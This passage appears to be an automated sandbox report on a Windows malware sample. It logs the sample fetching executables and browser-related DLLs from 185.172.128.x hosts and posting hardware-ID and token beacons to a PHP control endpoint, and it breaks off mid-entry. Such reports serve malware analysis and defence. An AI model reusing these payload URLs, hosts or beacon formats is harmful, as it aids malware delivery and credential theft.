------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="message"her7h48r------GCGHJEBGHJKEBFHIJDHC--
                          Source: global trafficHTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                          Source: Joe Sandbox ViewIP Address: 185.172.128.228 185.172.128.228
                          Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
                          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                          Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                          Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                          Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,0_2_0042676C
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 26 Apr 2024 20:53:40 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec
                          Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
                          Source: global trafficDNS traffic detected: DNS query: note.padd.cn.com
                          Source: global trafficDNS traffic detected: DNS query: svc.iolo.com
                          Source: global trafficDNS traffic detected: DNS query: download.iolo.net
                          Source: global trafficDNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com
                          Source: unknownHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 32 33 32 42 41 32 36 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="hwid"6A5232BA26AD2322695909------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="build"default10------BFHDAEHDAKECGCAKFCFI--
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe00
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe6=
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
                          Source: u5ek.0.exe, 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllA
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllE
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dllo
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dllY
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll7
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.000000000432A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000003.1778198760.000000000439F000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
                          Source: u5ek.0.exe, 00000001.00000003.1778198760.000000000439F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php(;T
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpO
                          Source: u5ek.0.exe, 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpad32c124f7c2674f26e5e63942ecbrelease05bfdde8fa3fa3eef0df8c
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2914238389.000002721BB20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://compositewpf.codeplex.com/
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                          Source: run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                          Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 